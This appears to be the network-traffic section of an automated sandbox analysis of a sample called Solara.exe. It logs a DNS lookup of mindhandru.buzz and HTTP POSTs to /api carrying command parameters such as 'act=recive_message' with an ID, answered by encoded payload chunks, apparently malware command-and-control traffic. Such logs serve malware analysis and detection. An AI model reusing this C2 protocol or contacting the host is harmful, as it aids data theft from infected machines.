                                                                                                                                    Dec 27, 2024 16:21:10.581778049 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:10.582006931 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:10.582070112 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:10.582328081 CET49738443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:10.582348108 CET44349738172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:11.024008989 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:11.024105072 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:11.024204969 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:11.024478912 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:11.024502993 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.336869001 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.336999893 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.338244915 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.338298082 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.339214087 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.348953009 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.349853039 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.349912882 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.350052118 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.350099087 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.350248098 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.350331068 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.350476027 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.350652933 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.350692987 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.350739956 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.350779057 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.350950003 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.351150990 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.351202011 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.351443052 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.351488113 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.351536036 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.351639032 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.351783991 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.351849079 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.351871014 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.351921082 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.352160931 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.352204084 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.352247000 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.352341890 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.352361917 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.352478981 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.352591038 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.591502905 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.591679096 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.591730118 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.591846943 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:12.635371923 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:12.807954073 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:14.826925993 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:14.827045918 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:14.827112913 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:14.827398062 CET49739443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:14.827440977 CET44349739172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:14.888715029 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:14.888766050 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:14.888838053 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:14.889338970 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:14.889353037 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.149838924 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.149908066 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.151004076 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.151015043 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.151349068 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.153666973 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.153687954 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.153748989 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.932926893 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.932988882 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.933028936 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.933048964 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.933079004 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.933116913 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.933125019 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.933162928 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.933202982 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.933211088 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.941299915 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.941348076 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.941356897 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.953056097 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.953118086 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.953126907 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.961309910 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.961364985 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.961371899 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.961400032 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.961443901 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.961502075 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.961517096 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    Dec 27, 2024 16:21:16.961541891 CET49741443192.168.2.4172.67.165.185
                                                                                                                                    Dec 27, 2024 16:21:16.961546898 CET44349741172.67.165.185192.168.2.4
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Dec 27, 2024 16:20:56.475796938 CET6263553192.168.2.41.1.1.1
                                                                                                                                    Dec 27, 2024 16:20:56.774569988 CET53626351.1.1.1192.168.2.4
                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Dec 27, 2024 16:20:56.475796938 CET192.168.2.41.1.1.10x876dStandard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Dec 27, 2024 16:20:56.774569988 CET1.1.1.1192.168.2.40x876dNo error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                                                    Dec 27, 2024 16:20:56.774569988 CET1.1.1.1192.168.2.40x876dNo error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                                                                    • mindhandru.buzz
                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.449733172.67.165.1854437620C:\Users\user\Desktop\Solara.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-27 15:20:58 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 8
                                                                                                                                    Host: mindhandru.buzz
                                                                                                                                    2024-12-27 15:20:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                    Data Ascii: act=life
                                                                                                                                    2024-12-27 15:20:58 UTC1127INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 27 Dec 2024 15:20:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=ig2n8u9p734sh8igvj3ao0nln4; expires=Tue, 22 Apr 2025 09:07:37 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmx9c0dfrBn5pjxilVhZLSk0cP6aJJnbdnisovylQBx%2BIZwbrzZapaCIwo2JQD77E3NPYQV6c9zcHZi7shLWFON%2FycOQ7swOFq%2B%2FoyigQnbfPT%2F7MZB0QkO7YqywYXlR6RA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f8a4c349a3ac45c-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1685&rtt_var=634&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1722713&cwnd=243&unsent_bytes=0&cid=4b93e7863f7879ac&ts=787&x=0"
                                                                                                                                    2024-12-27 15:20:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                    Data Ascii: 2ok
                                                                                                                                    2024-12-27 15:20:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.449734172.67.165.1854437620C:\Users\user\Desktop\Solara.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-27 15:21:00 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 51
                                                                                                                                    Host: mindhandru.buzz
                                                                                                                                    2024-12-27 15:21:00 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 39 39 31 32 35 33 35 26 6a 3d
                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--629912535&j=
                                                                                                                                    2024-12-27 15:21:00 UTC1121INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 27 Dec 2024 15:21:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=q8lggsegttov11ps0mcdtprcp0; expires=Tue, 22 Apr 2025 09:07:39 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQdRevtfeoGmXdZKKwAcyDQn%2B2XBK2Xcm4fdNz7azALi4Gedq5WgrZPk0FHabcWjRHUk5kjOMEYvMXgmY%2FFXxSz7m2R1igf94w6R1GnB5sSUNb8b4PKUt3CpOY7h1EloHnk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f8a4c41bfca3354-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1820&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=950&delivery_rate=1567364&cwnd=114&unsent_bytes=0&cid=453e86b631579a5b&ts=791&x=0"
                                                                                                                                    2024-12-27 15:21:00 UTC248INData Raw: 63 34 33 0d 0a 71 77 77 67 65 37 2b 48 67 73 65 74 54 4b 66 64 64 71 72 58 76 7a 62 64 4c 71 64 49 4a 58 35 73 4e 2f 4e 61 36 53 77 43 6a 4d 6a 51 4c 6c 5a 5a 68 62 4f 75 35 64 34 70 68 65 63 43 32 4b 4c 61 47 76 39 50 77 32 6f 66 47 41 31 62 67 44 2f 46 44 6e 54 68 36 70 46 71 51 52 66 4d 34 71 37 6c 79 44 53 46 35 79 33 52 39 64 70 59 2f 78 53 46 4c 55 38 63 44 56 75 52 4f 34 4a 44 63 75 43 72 77 32 42 48 45 39 72 6b 35 71 62 42 49 63 4b 34 45 38 75 39 30 56 2b 77 52 73 70 71 43 56 77 4a 54 64 46 67 79 32 46 6e 2b 4b 6e 6d 62 56 4d 51 6e 66 71 75 76 49 38 70 79 66 39 4d 69 4c 62 61 56 4c 46 49 77 79 4e 4e 46 67 52 54 6b 44 36 44 58 47 76 71 6f 4d 4e 75 52 42 4c 51 37 66 4b 72 79 79 62 4a 76 68 6e 4c 39 5a 4d 55 75 46 53 46 63 67 64
                                                                                                                                    Data Ascii: c43qwwge7+HgsetTKfddqrXvzbdLqdIJX5sN/Na6SwCjMjQLlZZhbOu5d4phecC2KLaGv9Pw2ofGA1bgD/FDnTh6pFqQRfM4q7lyDSF5y3R9dpY/xSFLU8cDVuRO4JDcuCrw2BHE9rk5qbBIcK4E8u90V+wRspqCVwJTdFgy2Fn+KnmbVMQnfquvI8pyf9MiLbaVLFIwyNNFgRTkD6DXGvqoMNuRBLQ7fKryybJvhnL9ZMUuFSFcgd
                                                                                                                                    2024-12-27 15:21:00 UTC1369INData Raw: 50 50 46 61 41 4b 5a 35 44 63 4f 6a 71 31 69 42 62 57 64 72 70 6f 50 32 50 4a 73 6d 78 45 63 75 36 32 6c 57 2f 58 73 6f 71 52 42 51 47 55 5a 73 33 68 45 46 75 35 4b 33 42 5a 30 55 57 32 75 33 6d 71 73 78 75 69 2f 38 54 30 50 57 46 46 4a 39 63 78 69 6c 54 45 52 38 56 6a 6e 61 53 44 6d 66 69 36 70 45 75 52 42 66 63 36 4f 43 33 78 79 58 4f 75 67 62 44 76 4e 42 5a 76 30 48 50 4a 55 51 63 43 56 2b 62 4e 34 46 4b 62 65 4f 73 79 57 34 43 56 35 33 69 2b 4f 57 58 62 75 61 36 42 4d 2b 35 79 78 61 46 44 4e 70 6b 58 6c 77 4a 57 64 46 67 79 30 5a 6c 37 61 6e 43 59 55 45 52 31 76 66 67 74 38 6b 6a 77 4b 30 53 7a 62 76 58 56 36 31 47 79 79 78 45 46 51 56 63 6c 44 2b 50 44 69 36 75 72 64 45 75 47 6c 6e 38 36 4f 75 70 78 54 6e 46 2f 77 75 47 72 4a 31 54 73 77 79 64 61 6b
                                                                                                                                    Data Ascii: PPFaAKZ5DcOjq1iBbWdrpoP2PJsmxEcu62lW/XsoqRBQGUZs3hEFu5K3BZ0UW2u3mqsxui/8T0PWFFJ9cxilTER8VjnaSDmfi6pEuRBfc6OC3xyXOugbDvNBZv0HPJUQcCV+bN4FKbeOsyW4CV53i+OWXbua6BM+5yxaFDNpkXlwJWdFgy0Zl7anCYUER1vfgt8kjwK0SzbvXV61GyyxEFQVclD+PDi6urdEuGln86OupxTnF/wuGrJ1Tswydak
                                                                                                                                    2024-12-27 15:21:00 UTC1369INData Raw: 33 33 69 4d 56 69 43 32 36 75 4e 74 56 68 72 58 70 39 57 6d 77 53 44 43 71 56 54 58 2b 38 51 55 75 45 43 46 63 67 63 52 44 31 32 58 4b 6f 52 44 59 2b 43 6b 78 6d 74 4e 45 64 33 6c 37 61 44 4c 4a 63 36 38 47 63 79 6e 31 31 53 33 53 63 51 67 54 56 78 41 46 5a 59 67 79 78 59 67 33 37 33 43 4c 48 63 61 30 2b 76 6e 73 34 38 78 69 36 5a 55 7a 37 6d 64 44 50 39 42 7a 53 39 43 45 77 39 66 6e 7a 32 42 51 6d 6a 67 71 64 74 68 52 68 6e 52 37 65 71 6f 77 53 72 4e 74 68 2f 44 73 39 31 56 74 51 79 4c 61 6b 41 45 54 67 33 52 44 49 78 43 62 65 48 6f 2f 47 31 4d 46 39 72 7a 6f 4c 71 42 4e 34 57 34 47 49 6a 74 6e 56 69 32 54 4d 34 67 51 78 77 4a 57 4a 51 37 6a 45 31 74 36 61 44 48 61 55 59 56 31 4f 6a 6d 70 63 67 71 77 4b 30 52 77 62 6e 52 46 50 45 4d 77 6a 49 48 52 45 35
                                                                                                                                    Data Ascii: 33iMViC26uNtVhrXp9WmwSDCqVTX+8QUuECFcgcRD12XKoRDY+CkxmtNEd3l7aDLJc68Gcyn11S3ScQgTVxAFZYgyxYg373CLHca0+vns48xi6ZUz7mdDP9BzS9CEw9fnz2BQmjgqdthRhnR7eqowSrNth/Ds91VtQyLakAETg3RDIxCbeHo/G1MF9rzoLqBN4W4GIjtnVi2TM4gQxwJWJQ7jE1t6aDHaUYV1OjmpcgqwK0RwbnRFPEMwjIHRE5
                                                                                                                                    2024-12-27 15:21:00 UTC160INData Raw: 78 59 67 35 36 50 62 59 45 77 51 30 4f 50 6f 6f 73 45 6a 7a 72 6b 66 7a 37 4c 62 57 62 64 42 77 43 6c 47 47 41 52 48 6b 6a 4f 42 51 32 71 75 35 49 6c 70 57 6c 6d 46 70 63 65 70 35 6a 37 65 72 51 4b 49 71 70 4e 4e 2f 30 76 4a 61 68 39 63 44 56 71 59 4e 34 4e 47 62 2b 47 75 78 32 68 45 46 4e 6a 71 36 72 66 48 49 4d 69 30 47 38 4f 6e 33 56 6d 37 51 4d 45 69 54 42 5a 4f 47 39 45 2f 6b 77 34 34 72 70 2f 45 59 55 49 61 79 36 58 2f 36 39 5a 75 77 72 4e 55 6b 50 58 52 57 72 39 0d 0a
                                                                                                                                    Data Ascii: xYg56PbYEwQ0OPoosEjzrkfz7LbWbdBwClGGARHkjOBQ2qu5IlpWlmFpcep5j7erQKIqpNN/0vJah9cDVqYN4NGb+Gux2hEFNjq6rfHIMi0G8On3Vm7QMEiTBZOG9E/kw44rp/EYUIay6X/69ZuwrNUkPXRWr9
                                                                                                                                    2024-12-27 15:21:00 UTC1369INData Raw: 33 63 64 39 0d 0a 44 79 53 5a 4d 46 41 39 5a 6e 7a 2b 4f 52 32 6a 6d 75 4d 68 71 53 68 6a 54 36 75 47 68 79 69 76 42 75 42 44 4f 75 70 30 61 2f 30 76 64 61 68 39 63 49 58 4b 6b 65 71 70 30 49 50 48 6b 30 43 35 46 46 5a 32 39 6f 4b 6e 4d 49 73 32 77 45 73 47 35 31 31 32 30 51 4d 34 75 53 78 55 4c 55 35 41 39 6a 6b 39 6b 34 71 44 50 62 55 45 57 30 75 72 6f 35 59 46 75 77 71 64 55 6b 50 58 34 51 37 52 43 77 32 70 59 55 68 63 56 6c 6a 54 4c 46 69 44 69 6f 38 39 6f 52 78 58 63 34 2b 69 67 78 79 72 45 75 52 4c 4c 75 74 6c 52 76 6b 50 42 4a 6b 6b 57 44 31 53 64 4d 34 52 46 5a 61 37 6b 69 57 6c 61 57 59 57 6c 30 61 62 5a 4f 64 57 7a 56 4e 66 37 78 42 53 34 51 49 56 79 42 78 30 63 58 35 73 32 6a 6b 46 6c 37 61 58 4f 59 30 51 56 31 2b 7a 6f 6f 38 41 6e 31 37 77 59
                                                                                                                                    Data Ascii: 3cd9DySZMFA9Znz+OR2jmuMhqShjT6uGhyivBuBDOup0a/0vdah9cIXKkeqp0IPHk0C5FFZ29oKnMIs2wEsG51120QM4uSxULU5A9jk9k4qDPbUEW0uro5YFuwqdUkPX4Q7RCw2pYUhcVljTLFiDio89oRxXc4+igxyrEuRLLutlRvkPBJkkWD1SdM4RFZa7kiWlaWYWl0abZOdWzVNf7xBS4QIVyBx0cX5s2jkFl7aXOY0QV1+zoo8An17wY
                                                                                                                                    2024-12-27 15:21:00 UTC1369INData Raw: 43 79 54 4e 63 6c 51 42 73 48 58 6f 4d 79 6a 45 6c 72 35 71 48 47 61 46 41 56 30 2f 66 6c 74 39 31 75 69 2f 38 54 30 50 57 46 46 49 6c 4c 31 54 70 45 58 6a 39 44 6b 69 36 41 51 32 79 75 74 59 64 33 41 68 37 52 70 62 6a 6c 79 53 48 4d 76 42 76 4a 76 4e 46 5a 75 6b 58 41 4b 30 45 59 42 46 2b 52 50 6f 31 50 5a 65 53 70 79 47 52 4c 48 74 58 69 34 37 65 50 59 49 57 34 44 49 6a 74 6e 58 32 34 58 73 73 36 42 77 4e 41 54 4e 45 2f 68 77 34 34 72 71 37 44 59 55 59 65 30 65 50 6c 6f 38 49 76 79 72 34 55 78 37 48 57 58 62 6c 4e 79 43 39 4b 47 42 78 66 6d 6a 65 48 52 32 7a 6a 36 6f 63 75 52 51 47 64 76 61 43 55 77 69 44 4c 75 41 4b 49 71 70 4e 4e 2f 30 76 4a 61 68 39 63 44 31 6d 65 4f 34 52 4e 59 2b 2b 67 32 33 78 4f 45 4e 58 67 37 4b 37 42 4b 4e 65 35 47 38 47 32 33
                                                                                                                                    Data Ascii: CyTNclQBsHXoMyjElr5qHGaFAV0/flt91ui/8T0PWFFIlL1TpEXj9Dki6AQ2yutYd3Ah7RpbjlySHMvBvJvNFZukXAK0EYBF+RPo1PZeSpyGRLHtXi47ePYIW4DIjtnX24Xss6BwNATNE/hw44rq7DYUYe0ePlo8Ivyr4Ux7HWXblNyC9KGBxfmjeHR2zj6ocuRQGdvaCUwiDLuAKIqpNN/0vJah9cD1meO4RNY++g23xOENXg7K7BKNe5G8G23
                                                                                                                                    2024-12-27 15:21:00 UTC1369INData Raw: 46 5a 41 63 4e 43 55 54 52 59 4a 31 65 64 2b 6d 31 68 33 63 43 48 74 47 6c 75 4f 58 4a 4a 38 4f 34 45 73 61 6e 32 46 4b 77 51 38 77 6a 51 78 51 4e 56 5a 55 38 6a 45 74 6a 34 71 48 4f 62 55 30 64 31 4f 76 70 71 6f 39 67 68 62 67 4d 69 4f 32 64 64 61 52 50 79 53 63 48 41 30 42 4d 30 54 2b 48 44 6a 69 75 70 73 64 72 51 68 50 62 34 65 57 6a 78 53 76 46 74 42 66 48 73 64 74 51 73 45 7a 4f 49 30 59 61 43 31 2b 61 50 6f 5a 4e 5a 75 6a 71 68 79 35 46 41 5a 32 39 6f 49 58 55 49 38 6d 34 56 4e 66 37 78 42 53 34 51 49 56 79 42 78 63 43 55 5a 59 34 68 6b 31 6f 36 36 37 44 61 30 49 52 7a 2b 33 67 6f 74 30 38 78 62 59 52 78 4c 62 64 55 4c 6c 46 77 79 6c 44 58 45 41 56 6c 69 44 4c 46 69 44 44 70 73 35 48 52 51 4b 64 2b 71 36 38 6a 79 6e 4a 2f 30 79 49 74 4e 5a 65 73 45
                                                                                                                                    Data Ascii: FZAcNCUTRYJ1ed+m1h3cCHtGluOXJJ8O4Esan2FKwQ8wjQxQNVZU8jEtj4qHObU0d1Ovpqo9ghbgMiO2ddaRPyScHA0BM0T+HDjiupsdrQhPb4eWjxSvFtBfHsdtQsEzOI0YaC1+aPoZNZujqhy5FAZ29oIXUI8m4VNf7xBS4QIVyBxcCUZY4hk1o667Da0IRz+3got08xbYRxLbdULlFwylDXEAVliDLFiDDps5HRQKd+q68jynJ/0yItNZesE
                                                                                                                                    2024-12-27 15:21:00 UTC1369INData Raw: 58 41 38 56 79 51 47 53 44 6e 61 75 38 70 73 67 41 67 75 64 76 61 44 69 7a 44 7a 58 75 52 66 65 74 70 70 71 67 57 76 54 49 45 41 4d 43 55 4b 65 65 4d 55 4f 62 36 37 79 38 43 35 4c 48 73 62 30 39 71 6a 66 4b 59 57 41 57 6f 69 74 6e 51 7a 2f 65 63 59 6b 53 52 73 59 52 4e 77 66 6e 55 52 6e 2f 71 33 65 59 51 4a 58 6e 65 4f 67 2f 5a 78 67 68 62 73 46 69 4f 32 4e 42 75 51 5a 6c 6e 30 58 54 68 45 62 69 48 69 64 44 6a 69 38 35 49 6c 38 41 6b 47 64 6f 75 4f 33 33 53 6a 47 71 52 65 50 69 2b 4e 7a 70 55 48 44 50 56 59 69 4d 46 4b 4c 4e 59 31 5a 63 61 4b 2f 79 6d 42 4d 48 73 75 6c 72 75 58 41 62 70 32 47 56 49 44 31 34 68 72 2f 56 49 56 79 42 79 6b 4e 57 35 38 2f 6e 56 38 74 79 62 44 45 61 46 55 49 6e 61 75 67 6f 34 39 32 6c 66 46 55 7a 4b 53 64 44 4f 38 65 6e 6e 38
                                                                                                                                    Data Ascii: XA8VyQGSDnau8psgAgudvaDizDzXuRfetppqgWvTIEAMCUKeeMUOb67y8C5LHsb09qjfKYWAWoitnQz/ecYkSRsYRNwfnURn/q3eYQJXneOg/ZxghbsFiO2NBuQZln0XThEbiHidDji85Il8AkGdouO33SjGqRePi+NzpUHDPVYiMFKLNY1ZcaK/ymBMHsulruXAbp2GVID14hr/VIVyBykNW58/nV8tybDEaFUInaugo492lfFUzKSdDO8enn8
